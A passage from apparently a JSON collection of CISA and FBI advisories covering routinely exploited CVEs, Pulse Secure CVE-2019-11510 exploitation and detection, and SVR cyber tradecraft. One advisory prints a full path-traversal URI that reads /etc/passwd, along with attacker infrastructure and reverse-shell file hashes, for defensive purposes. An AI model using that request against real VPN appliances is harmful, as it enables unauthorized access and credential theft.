IOCs: <https://www.us-cert.gov/ncas/analysis-reports/ar20-133f>\n\n_**CVE-2015-1641**_\n\n * Vulnerable Products: Microsoft Word 2007 SP3, Office 2010 SP2, Word 2010 SP2, Word 2013 SP1, Word 2013 RT SP1, Word for Mac 2011, Office Compatibility Pack SP3, Word Automation Services on SharePoint Server 2010 SP2 and 2013 SP1, and Office Web Apps Server 2010 SP2 and 2013 SP1\n * Associated Malware: Toshliph, UWarrior\n * Mitigation: Update affected Microsoft products with the latest security patches\n * More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2015-1641>\n * IOCs: <https://www.us-cert.gov/ncas/analysis-reports/ar20-133m>\n\n_**CVE-2018-7600**_\n\n * Vulnerable Products: Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1\n * Associated Malware: Kitty\n * Mitigation: Upgrade to the most recent version of Drupal 7 or 8 core.\n * More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2018-7600>\n\n## Mitigations for Vulnerabilities Exploited in 2020\n\n**_CVE-2019-11510_**\n\n * Vulnerable Products: Pulse Connect Secure 9.0R1 - 9.0R3.3, 8.3R1 - 8.3R7, 8.2R1 - 8.2R12, 8.1R1 - 8.1R15 and Pulse Policy Secure 9.0R1 - 9.0R3.1, 5.4R1 - 5.4R7, 5.3R1 - 5.3R12, 5.2R1 - 5.2R12, 5.1R1 - 5.1R15\n * Mitigation: Update affected Pulse Secure devices with the latest security patches.\n * More Detail: \n * <https://www.us-cert.gov/ncas/alerts/aa20-107a>\n * <https://nvd.nist.gov/vuln/detail/CVE-2019-11510>\n * <https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/>\n\n_**CVE-2019-19781**_\n\n * Vulnerable Products: Citrix Application Delivery Controller, Citrix Gateway, and Citrix SDWAN WANOP\n * Mitigation: Update affected Citrix devices with the latest security patches\n * More Detail: \n * <https://www.us-cert.gov/ncas/alerts/aa20-020a>\n * <https://www.us-cert.gov/ncas/alerts/aa20-031a>\n * 
<https://www.fireeye.com/blog/products-and-services/2020/01/fireeye-and-citrix-tool-scans-for-iocs-related-to-vulnerability.html>\n * <https://nvd.nist.gov/vuln/detail/CVE-2019-19781>\n * <https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/>\n\n_**Oversights in Microsoft O365 Security Configurations**_\n\n * Vulnerable Products: Microsoft O365\n * Mitigation: Follow Microsoft O365 security recommendations\n * More Detail: <https://www.us-cert.gov/ncas/alerts/aa20-120a>\n\n**_Organizational Cybersecurity Weaknesses_**\n\n * Vulnerable Products: Systems, networks, and data\n * Mitigation: Follow cybersecurity best practices\n * More Detail: <https://www.cisa.gov/cyber-essentials>\n\n## CISA\u2019s Free Cybersecurity Services\n\nAdversaries use known vulnerabilities and phishing attacks to compromise the security of organizations. CISA offers several free scanning and testing services to help organizations reduce their exposure to threats by taking a proactive approach to mitigating attack vectors.\n\n**Cyber Hygiene: Vulnerability Scanning** helps secure your internet-facing systems from weak configuration and known vulnerabilities. It also encourages organizations to adopt modern security best practices. CISA performs regular network and vulnerability scans and delivers a weekly report for your action. Once initiated, this service is mostly automated and requires little direct interaction. After CISA receives the required paperwork for Cyber Hygiene, our scans will start within 72 hours and you\u2019ll begin receiving reports within two weeks.\n\n**Web Application Service** checks your publicly accessible web sites for potential bugs and weak configurations. It provides a \u201csnapshot\u201d of your publicly accessible web applications and also checks functionality and performance in your application. 
\nIf your organization would like these services or wants more information about other useful services, please email [vulnerability_info@cisa.dhs.gov](<mailto:vulnerability_info@cisa.dhs.gov>).\n\n## CISA Online Resources\n\nThe Patch Factory: CISA infographic depicting the global infrastructure for managing vulnerabilities.\n\n[CISA Alert: (AA20-120A) Microsoft Office 365 Security Recommendations](<https://www.us-cert.gov/ncas/alerts/aa20-120a>): recommendations for organizations to review and ensure their O365 environment is configured to protect, detect, and respond against would-be attackers.\n\n[CISA\u2019s Cyber Essentials](<https://www.cisa.gov/cyber-essentials>): a guide for leaders of small businesses as well as leaders of small and local government agencies to develop an actionable understanding of where to start implementing organizational cybersecurity practices.\n\n### Contact Information\n\nIf you have any further questions related to this Joint Alert, please contact the FBI at either your local Cyber Task Force or FBI CyWatch.\n\n * You can find your local field offices at <https://www.fbi.gov/contact-us/field>\n * CyWatch can be contacted through e-mail at [cywatch@fbi.gov](<mailto:cywatch@fbi.gov>) or by phone at 1-855-292-3937\n\nTo request incident response resources or technical assistance related to these threats, contact CISA at [CISAServiceDesk@cisa.dhs.gov](<mailto:CISAServiceDesk@cisa.dhs.gov>).\n\n### References\n\n[[1] Cybersecurity Vulnerabilities and Exposures (CVE) list](<https://cve.mitre.org/cve/>)\n\n[[2] CISA Alert (TA15-119A). Top 30 Targeted High Risk Vulnerabilities. (2016, September 29)](<https://www.us-cert.gov/ncas/alerts/TA15-119A>)\n\n[[3] Recorded Future. 2019 Vulnerability Report: Cybercriminals Continue to Target Microsoft Products. 
(2020, February 4)](<https://www.recordedfuture.com/top-vulnerabilities-2019/>)\n\n### Revisions\n\nMay 12, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-05-12T12:00:00", "type": "ics", "title": "Top 10 Routinely Exploited Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2015-1641", "CVE-2017-0143", "CVE-2017-0199", "CVE-2017-11882", "CVE-2017-5638", "CVE-2017-8759", "CVE-2018-4878", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-19781"], "modified": "2020-05-12T12:00:00", "id": "AA20-133A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-133a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-14T18:35:59", "description": "### Summary\n\n_**Note: ** This Activity Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework. 
See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v7/matrices/enterprise/>) framework for all referenced threat actor techniques and mitigations._\n\nThis Alert provides an update to Cybersecurity and Infrastructure Security Agency (CISA) [Alert AA20-010A: Continued Exploitation of Pulse Secure VPN Vulnerability](<https://www.us-cert.gov/ncas/alerts/aa20-010a>), which advised organizations to immediately patch CVE-2019-11510\u2014an arbitrary file reading vulnerability affecting Pulse Secure virtual private network (VPN) appliances.[[1]](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>) CISA is providing this update to alert administrators that threat actors who successfully exploited CVE-2019-11510 and stole a victim organization\u2019s credentials will still be able to access\u2014and move laterally through\u2014that organization\u2019s network after the organization has patched this vulnerability if the organization did not change those stolen credentials.\n\nThis Alert provides new detection methods for this activity, including a [CISA-developed tool](<https://github.com/cisagov/check-your-pulse>) that helps network administrators search for indicators of compromise (IOCs) associated with exploitation of CVE-2019-11510. This Alert also provides mitigations for victim organizations to recover from attacks resulting from CVE-2019-11510. CISA encourages network administrators to remain aware of the ramifications of exploitation of CVE-2019-11510 and to apply the detection measures and mitigations provided in this report to secure networks against these attacks.\n\nFor a downloadable copy of IOCs, see STIX file.\n\n## Background\n\nCISA has conducted multiple incident response engagements at U.S. Government and commercial entities where malicious cyber threat actors have exploited CVE-2019-11510\u2014an arbitrary file reading vulnerability affecting Pulse Secure VPN appliances\u2014to gain access to victim networks. 
Although Pulse Secure released patches for CVE-2019-11510 in April 2019,[[2]](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>) CISA has observed incidents where compromised Active Directory credentials were used months after the victim organization patched their VPN appliance.\n\n### Technical Details\n\nCISA determined that cyber threat actors have been able to obtain plaintext Active Directory credentials after gaining _Initial Access_ [[TA0001]](<https://attack.mitre.org/versions/v7/tactics/TA0001/>) to a victim organization\u2019s network via VPN appliances. Cyber threat actors used these _Valid Accounts_ [[T1078]](<https://attack.mitre.org/versions/v7/techniques/T1078/>) in conjunction with:\n\n * _External Remote Services_ [[T1133]](<https://attack.mitre.org/versions/v7/techniques/T1133>) for access,\n * _Remote Services_ [[T1021]](<https://attack.mitre.org/versions/v7/techniques/T1021>) for _Lateral Movement _[[TA0008]](<https://attack.mitre.org/versions/v7/tactics/TA0008/>) to move quickly throughout victim network environments, and\n * _Data Encrypted for Impact_ [[T1486 ]](<https://attack.mitre.org/versions/v7/techniques/T1486>) for impact, as well as\n * _Exfiltration _[[TA0010]](<https://attack.mitre.org/versions/v7/tactics/TA0010/>) and sale of the data.\n\n### Initial Access\n\nCVE-2019-11510 is a pre-authentication arbitrary file read vulnerability affecting Pulse Secure VPN appliances. A remote attacker can exploit this vulnerability to request arbitrary files from a VPN server. 
The vulnerability occurs because directory traversal is hard-coded to be allowed if the path contains `dana/html5/acc`.[[3]](<https://twitter.com/XMPPwocky/status/1164874297690611713/photo/1>),[[4]](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?do=findComment&comment=848>) For example, a malicious cyber actor can obtain the contents of `/etc/passwd` [[5]](<https://github.com/BishopFox/pwn-pulse/blob/master/pwn-pulse.sh>) by requesting the following uniform resource identifier (URI):\n\n`https://vulnvpn.example[.]com/dana-na/../dana/html5/acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/`\n\nObtaining the contents of `/etc/passwd` gives the attacker access to basic information about local system accounts. This request was seen in the proof-of-concept (POC) code for this exploit on [GitHub](<https://github.com/BishopFox/pwn-pulse/blob/master/pwn-pulse.sh>). An attacker can also leverage the vulnerability to access other files that are useful for remote exploitation. By requesting the data.mdb object, an attacker can leak plaintext credentials of enterprise users.[[6]](<https://www.exploit-db.com/exploits/47297>),[[7]](<https://twitter.com/alyssa_herrera_/status/1164089995193225216?s=11>),[[8]](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?do=findComment&comment=848>)\n\nOpen-source reporting indicates that cyber threat actors can exploit CVE-2019-11510 to retrieve encrypted passwords;[[9]](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?tab=comments#comment-887>) however, CISA has not observed this behavior. 
By reviewing victim VPN appliance logs, CISA has noted cyber threat actors crafting requests that request files that allow for _Credential Dumping_ [[T1003]](<https://attack.mitre.org/versions/v7/techniques/T1003>) plaintext passwords from the VPN appliance.\n\n### Test Environment\n\nTo confirm the open-source reporting and validate what the cyber threat actors had access to, CISA used a test environment to send crafted requests. CISA used requests found both in proof-of-concept, open-source code and in requests from the logs of compromised victims. By doing so, CISA confirmed that plaintext Active Directory credentials were leaked and that it was possible to leak the local admin password to the VPN appliance. (See figure 1.)\n\n\n\n##### Figure 1: Exploitation of the VPN appliance leading to plaintext local admin credentials\n\nCISA\u2019s test environment consisted of a domain controller (DC) running Windows Server 2016, an attacker machine, and a Pulse Secure VPN appliance version 9.0R3 (build 64003). CISA connected the attacker machine to the external interface of the Pulse Secure VPN appliance and the DC to the internal interface.\n\nCISA created three accounts for the purpose of validating the ability to compromise them by exploiting CVE-2019-11510.\n\n * Local Pulse Secure Admin account \n * Username: `admin`; Password: `pulse-local-password`\n * Domain Administrator Account \n * Username: `Administrator`; Password: `domain-admin-password1`\n * CISA-test-user Account \n * Username: `cisa-test-user`; Password: `Use_s3cure_passwords`\n\nAfter creating the accounts, CISA joined the VPN appliance to the test environment domain, making a point not to cache the domain administrator password. 
(See figure 2.)\n\n\n\n##### Figure 2: VPN appliance joined to the domain without caching the domain administrator password\n\nCISA used a similar file inclusion to test the ability to _Credential Dump _[[T1003]](<https://attack.mitre.org/versions/v7/techniques/T1003>) the domain administrator password. CISA determined it was possible to leak the domain administrator password that was used to join the device to the domain without saving the credentials. Refer to figure 3 for the URI string tested by CISA.\n\n\n\n##### Figure 3: Exploitation of the VPN appliance leading to cleartext domain admin credentials\n\nNext, CISA validated the ability to _Credential Dump _[[T1003]](<https://attack.mitre.org/versions/v7/techniques/T1003>) a user password from the VPN appliance. To do this, CISA created a _user realm _(Pulse Secure configuration terminology) and configured its roles/resource groups to allow for Remote Desktop Protocol (RDP) over HTML5 (Apache Guacamole). After using the new user to remotely access an internal workstation over RDP, CISA used a crafted request (see figure 4) to leak the credentials from the device. (**Note:** the path to stored credentials is publicly available.)[[10]](<https://twitter.com/alyssa_herrera_/status/1164089995193225216?s=11>)\n\n\n\n##### Figure 4: Exploitation of the VPN appliance leading to plaintext user credentials\n\nThis test confirmed CISA\u2019s suspicion that threat actors had access to each of the various compromised environments.\n\n### Cyber Threat Actor Behavior in Victim Network Environments\n\nCISA observed\u2014once credentials were compromised\u2014cyber threat actors accessing victim network environments via the Pulse Secure VPN appliances. 
Cyber threat actors used _Connection Proxies _[[T1090 ]](<https://attack.mitre.org/versions/v7/techniques/T1090>)\u2014such as Tor infrastructure and virtual private servers (VPSs)\u2014to minimize the chance of detection when they connected to victim VPN appliances.\n\nUsing traditional host-based analysis, CISA identified the following malicious cyber actor actions occurring in a victim\u2019s environment:\n\n * Creating persistence via scheduled tasks/remote access trojans\n * Amassing files for exfiltration\n * Executing ransomware on the victim\u2019s network environment\n\nBy correlating these actions with the connection times and user accounts recorded in the victim\u2019s Pulse Secure `.access` logs, CISA was able to identify unauthorized threat actor connections to the victim\u2019s network environment. CISA was then able to use these Internet Protocol (IP) addresses and user-agents to identify unauthorized connections to the network environments of other victims. Refer to the Indicators of Compromise section for the IP addresses CISA observed making these unauthorized connections.\n\nIn one case, CISA observed a cyber threat actor attempting to sell the stolen credentials after 30 unsuccessful attempts to connect to the customer environment to escalate privileges and drop ransomware. CISA has also observed this threat actor successfully dropping ransomware at hospitals and U.S. Government entities.\n\nIn other cases, CISA observed threat actors leveraging tools, such as LogMeIn and TeamViewer, for persistence. These tools would enable threat actors to maintain access to the victim\u2019s network environment if they lost their primary connection.\n\n### Initial Detection\n\nConventional antivirus and endpoint detection and response solutions did not detect this type of activity because the threat actors used legitimate credentials and remote services. 
\n\nAn intrusion detection system may have noticed the exploitation of CVE-2019-11510 if the sensor had visibility to the external interface of the VPN appliance (possible in a customer\u2019s demilitarized zone) and if appropriate rules were in place. Heuristics in centralized logging may have been able to detect logins from suspicious or foreign IPs, if configured.\n\n### Post-Compromise Detection and IOC Detection Tool\n\nGiven that organizations that have applied patches for CVE-2019-11510 may still be at risk for exploitation from compromises that occurred pre-patch, CISA developed detection methods for organizations to determine if their patched VPN appliances have been targeted by the activity revealed in this report.\n\nTo detect past exploitation of CVE-2019-11510, network administrators should:\n\n 1. Turn on unauthenticated log requests (see figure 5). (**Note:** there is a risk of overwriting logs with unauthenticated requests so, if enabling this feature, be sure to frequently back up logs; if possible, use a remote syslog server.) \n\n\n\n##### Figure 5: Checkbox that enables logging exploit attacks\n\n 2. Check logs for exploit attempts. To detect lateral movement, system administrators should look in the logs for strings such as `../../../data` (see figure 6). \n\n\n\n##### Figure 6: Strings for detection of lateral movement\n\n 3. Manually review logs for unauthorized sessions and exploit attempts, especially sessions originating from unexpected geo-locations.\n 4. Run CISA\u2019s IOC detection tool. CISA developed a tool that enables administrators to triage logs (if authenticated request logging is turned on) and automatically search for IOCs associated with exploitation of CVE-2019-11510. CISA encourages administrators to visit [CISA\u2019s GitHub page](<https://github.com/cisagov/check-your-pulse>) to download and run the tool. 
While not exhaustive, this tool may find evidence of attempted compromise.\n\n### Indicators of Compromise\n\nCISA observed IP addresses making unauthorized connections to customer infrastructure. (**Note:** these IPs were observed as recently as February 15, 2020.) The IP addresses seen making unauthorized connections to customer infrastructure were different than IP addresses observed during initial exploitation. Please see the STIX file below for IPs.\n\nCISA observed the following user agents with this activity:\n\n * Mozilla/5.0 (Windows NT 6.1; rv:60.0) Gecko/20100101 Firefox/60.0\n * Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0\n * Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55[.]0.2883.87 Safari/537.36\n\nCISA also observed:\n\n * A cyber threat actor renaming portable executable (PE) files in an attempt to subvert application allow listing or antivirus (AV) protections. See table 1 for hashes of files used.\n * A threat actor \u201cliving off the land\u201d and utilizing C:\\Python\\ArcGIS to house malicious PE files, as well as using natively installed Python.\n * A threat actor attack infrastructure: 38.68.36(dot)112 port 9090 and 8088\n\n##### Table 1: Filenames and hashes of files used by a threat actor\n\nFilename | MD5 \n---|--- \nt.py (tied to scheduled task, python meterpreter reverse shell port 9090) | 5669b1fa6bd8082ffe306aa6e597d7f5 \ng.py (tied to scheduled task, python meterpreter reverse shell port 8088) | 61eebf58e892038db22a4d7c2ee65579 \n \nFor a downloadable copy of IOCs, see STIX file.\n\n### Mitigations\n\nCISA strongly urges organizations that have not yet done so to upgrade their Pulse Secure VPN to the corresponding patches for CVE-2019-11510. 
If\u2014after applying the detection measures in this alert\u2014organizations detect evidence of CVE-2019-11510 exploitation, CISA recommends changing passwords for all Active Directory accounts, including administrators and service accounts.\n\nCISA also recommends that organizations:\n\n * Look for unauthorized applications and scheduled tasks in their environment.\n * Remove any remote access programs not approved by the organization.\n * Remove any remote access trojans.\n * Carefully inspect scheduled tasks for scripts or executables that may allow an attacker to connect to an environment.\n\nIf organizations find evidence of malicious, suspicious, or anomalous activity or files, they should consider reimaging the workstation or server and redeploying back into the environment. CISA recommends performing checks to ensure the infection is gone even if the workstation or host has been reimaged.\n\n### Contact Information\n\nRecipients of this report are encouraged to contribute any additional information that they may have related to this threat. For any questions related to this report, please contact CISA at\n\n * Phone: (888) 282-0870\n * Email: [CISAServiceDesk@cisa.dhs.gov](<mailto:CISAServiceDesk@cisa.dhs.gov>)\n\n### References\n\n[[1] Pulse Secure Advisory SA44101](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>)\n\n[[2] Pulse Secure Advisory SA44101](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>)\n\n[[3] Twitter. @XMPPwocky. (2019, August 23). Your least favorite construct](<https://twitter.com/XMPPwocky/status/1164874297690611713/photo/1>)\n\n[[4] OpenSecurity Forums. Public vulnerability discussion. (2019, August 23).](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?do=findComment&comment=848>)\n\n[[5] GitHub. BishopFox / pwn-pulse. 
](<https://github.com/BishopFox/pwn-pulse/blob/master/pwn-pulse.sh>)\n\n[[6] File disclosure in Pulse Secure SSL VPN (Metasploit) ](<https://www.exploit-db.com/exploits/47297>)\n\n[[7] Twitter. @alyssa_herra ](<https://twitter.com/alyssa_herrera_/status/1164089995193225216?s=11>)\n\n[[8] OpenSecurity Forums. Public vulnerability discussion. (2019, August 23). ](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?do=findComment&comment=848>)\n\n[[9] OpenSecurity Forums. Public vulnerability discussion. (2019, August 31). ](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?tab=comments#comment-887>)\n\n[[10] Twitter. @alyssa_herra](<https://twitter.com/alyssa_herrera_/status/1164089995193225216?s=11>)\n\n### Revisions\n\nApril 16, 2020: Initial Version|October 23, 2020\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-10-24T12:00:00", "type": "ics", "title": "Continued Threat Actor Exploitation Post Pulse Secure VPN Patching", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], 
"modified": "2020-10-24T12:00:00", "id": "AA20-107A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-107a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-14T18:37:13", "description": "### Summary\n\nUnpatched Pulse Secure VPN servers continue to be an attractive target for malicious actors. Affected organizations that have not applied the software patch to fix an arbitrary file reading vulnerability, known as CVE-2019-11510, can become compromised in an attack. [[1]](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n\nAlthough Pulse Secure [[2]](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>) disclosed the vulnerability and provided software patches for the various affected products in April 2019, the Cybersecurity and Infrastructure Security Agency (CISA) continues to observe wide exploitation of CVE-2019-11510. [[3]](<https://www.kb.cert.org/vuls/id/927237/ >) [[4]](<https://www.us-cert.gov/ncas/current-activity/2019/07/26/vulnerabilities-multiple-vpn-applications >) [[5]](<https://www.us-cert.gov/ncas/current-activity/2019/10/16/multiple-vulnerabilities-pulse-secure-vpn>)\n\nCISA expects to see continued attacks exploiting unpatched Pulse Secure VPN environments and strongly urges users and administrators to upgrade to the corresponding fixes. 
[[6]](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>)\n\n## Timelines of Specific Events\n\n * April 24, 2019 \u2013 Pulse Secure releases initial advisory and software updates addressing multiple vulnerabilities.\n * May 28, 2019 \u2013 Large commercial vendors get reports of vulnerable VPN through HackerOne.\n * July 31, 2019 \u2013 Full use of exploit demonstrated using the admin session hash to get complete shell.\n * August 8, 2019 \u2013 Meh Chang and Orange Tsai demonstrate the VPN issues across multiple vendors (Pulse Secure) with detailed attack on active VPN exploitation.\n * August 24, 2019 \u2013 Bad Packets identifies over 14,500 vulnerable VPN servers globally still unpatched and in need of an upgrade.\n * October 7, 2019 \u2013 The National Security Agency (NSA) produces a Cybersecurity Advisory on Pulse Secure and other VPN products being targeted actively by advanced persistent threat actors.\n * October 16, 2019 \u2013 The CERT Coordination Center (CERT/CC) releases Vulnerability Note VU#927237: Pulse Secure VPN contains multiple vulnerabilities.\n * January 2020 \u2013 Media reports cybercriminals now targeting unpatched Pulse Secure VPN servers to install REvil (Sodinokibi) ransomware. \n\n### Technical Details\n\n## Impact\n\nA remote, unauthenticated attacker may be able to compromise a vulnerable VPN server. The attacker may be able to gain access to all active users and their plain-text credentials. 
It may also be possible for the attacker to execute arbitrary commands on each VPN client as it successfully connects to the VPN server.\n\nAffected versions:\n\n * Pulse Connect Secure 9.0R1 - 9.0R3.3\n * Pulse Connect Secure 8.3R1 - 8.3R7\n * Pulse Connect Secure 8.2R1 - 8.2R12\n * Pulse Connect Secure 8.1R1 - 8.1R15\n * Pulse Policy Secure 9.0R1 - 9.0R3.1\n * Pulse Policy Secure 5.4R1 - 5.4R7\n * Pulse Policy Secure 5.3R1 - 5.3R12\n * Pulse Policy Secure 5.2R1 - 5.2R12\n * Pulse Policy Secure 5.1R1 - 5.1R15\n\n### Mitigations\n\nThis vulnerability has no viable workarounds except for applying the patches provided by the vendor and performing required system updates.\n\nCISA strongly urges users and administrators to upgrade to the corresponding fixes. [[7]](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>)\n\n### References\n\n[[1] NIST NVD CVE-2019-11510 ](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n\n[[2] Pulse Secure Advisory SA44101](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>)\n\n[[3] CERT/CC Vulnerability Note VU#927237](<https://www.kb.cert.org/vuls/id/927237/>)\n\n[[4] CISA Current Activity Vulnerabilities in Multiple VPN Applications ](<https://www.us-cert.gov/ncas/current-activity/2019/07/26/vulnerabilities-multiple-vpn-applications>)\n\n[[5] CISA Current Activity Multiple Vulnerabilities in Pulse Secure VPN](<https://www.us-cert.gov/ncas/current-activity/2019/10/16/multiple-vulnerabilities-pulse-secure-vpn>)\n\n[[6] Pulse Secure Advisory SA44101](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>)\n\n[[7] Pulse Secure Advisory SA44101](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>)\n\n### Revisions\n\nJanuary 10, 2020: Initial Version|April 15, 2020: Revised to correct type of vulnerability\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": 
"CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-04-15T12:00:00", "type": "ics", "title": "Continued Exploitation of Pulse Secure VPN Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2020-04-15T12:00:00", "id": "AA20-010A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-010a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-14T18:32:15", "description": "### Summary\n\nThe Federal Bureau of Investigation (FBI), Department of Homeland Security (DHS), and Cybersecurity and Infrastructure Security Agency (CISA) assess Russian Foreign Intelligence Service (SVR) cyber actors\u2014also known as Advanced Persistent Threat 29 (APT 29), the Dukes, CozyBear, and Yttrium\u2014will continue to seek intelligence from U.S. and foreign entities through cyber exploitation, using a range of initial exploitation techniques that vary in sophistication, coupled with stealthy intrusion tradecraft within compromised networks. The SVR primarily targets government networks, think tank and policy analysis organizations, and information technology companies. 
On April 15, 2021, the White House released a statement on the recent SolarWinds compromise, attributing the activity to the SVR. For additional detailed information on identified vulnerabilities and mitigations, see the National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), and FBI Cybersecurity Advisory titled \u201cRussian SVR Targets U.S. and Allied Networks,\u201d released on April 15, 2021.\n\nThe FBI and DHS are providing information on the SVR\u2019s cyber tools, targets, techniques, and capabilities to aid organizations in conducting their own investigations and securing their networks.\n\nClick here for a PDF version of this report.\n\n### Threat Overview\n\nSVR cyber operations have posed a longstanding threat to the United States. Prior to 2018, several private cyber security companies published reports about APT 29 operations to obtain access to victim networks and steal information, highlighting the use of customized tools to maximize stealth inside victim networks and APT 29 actors\u2019 ability to move within victim environments undetected.\n\nBeginning in 2018, the FBI observed the SVR shift from using malware on victim networks to targeting cloud resources, particularly e-mail, to obtain information. The exploitation of Microsoft Office 365 environments following network access gained through use of modified SolarWinds software reflects this continuing trend. Targeting cloud resources probably reduces the likelihood of detection by using compromised accounts or system misconfigurations to blend in with normal or unmonitored traffic in an environment not well defended, monitored, or understood by victim organizations.\n\n### Technical Details\n\n### SVR Cyber Operations Tactics, Techniques, and Procedures\n\n### Password Spraying\n\nIn one 2018 compromise of a large network, SVR cyber actors used password spraying to identify a weak password associated with an administrative account. 
The actors conducted the password spraying activity in a \u201clow and slow\u201d manner, attempting a small number of passwords at infrequent intervals, possibly to avoid detection. The password spraying used a large number of IP addresses all located in the same country as the victim, including those associated with residential, commercial, mobile, and The Onion Router (TOR) addresses.\n\nThe organization unintentionally exempted the compromised administrator\u2019s account from multi-factor authentication requirements. With access to the administrative account, the actors modified permissions of specific e-mail accounts on the network, allowing any authenticated network user to read those accounts.\n\nThe actors also used the misconfiguration for compromised non-administrative accounts. That misconfiguration enabled logins using legacy single-factor authentication on devices which did not support multi-factor authentication. The FBI suspects this was achieved by spoofing user agent strings to appear to be older versions of mail clients, including Apple\u2019s mail client and old versions of Microsoft Outlook. After logging in as a non-administrative user, the actors used the permission changes applied by the compromised administrative user to access specific mailboxes of interest within the victim 